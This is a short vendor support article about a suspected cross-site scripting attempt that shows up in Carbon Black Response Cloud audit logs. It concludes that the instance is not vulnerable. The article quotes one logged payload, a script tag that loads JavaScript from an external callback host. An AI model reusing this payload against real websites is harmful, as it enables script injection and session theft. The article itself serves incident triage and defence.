CB Response Cloud: Suspected XSS Vulnerability in Audit Logging
search cancel

CB Response Cloud: Suspected XSS Vulnerability in Audit Logging

book

Article ID: 287884

calendar_today

Updated On:

Products

Carbon Black EDR (formerly Cb Response)

Issue/Introduction

Suspected XSS vulnerability in the audit logs suggest an attack is being made to the server
  • Audit logs forwarded to SIEM will show a similar entry to the below
    Unknown 2019-10-29 21:00:03.205757+00:00 "><script src=https://kzn.xss.ht></script>, <IPADDRESS> GET /api/v1/settings/global/advanced 403 Requires Authentication

Environment

  • Carbon Black Response Cloud: All Versions

Cause

A script is being sent to the instance

Resolution

The instance is not vulnerable to the XSS exploitation attempt.

Additional Information

  • Product Security has investigated the potential vulnerability. It is determined that the attack will not execute on the instance and therefore does not result in XSS Exploitation
  • The attempt is logged to the audit logs as expected
  • The script is treated as a string and there is no attempt to parse the IP or make use of it in any way¬†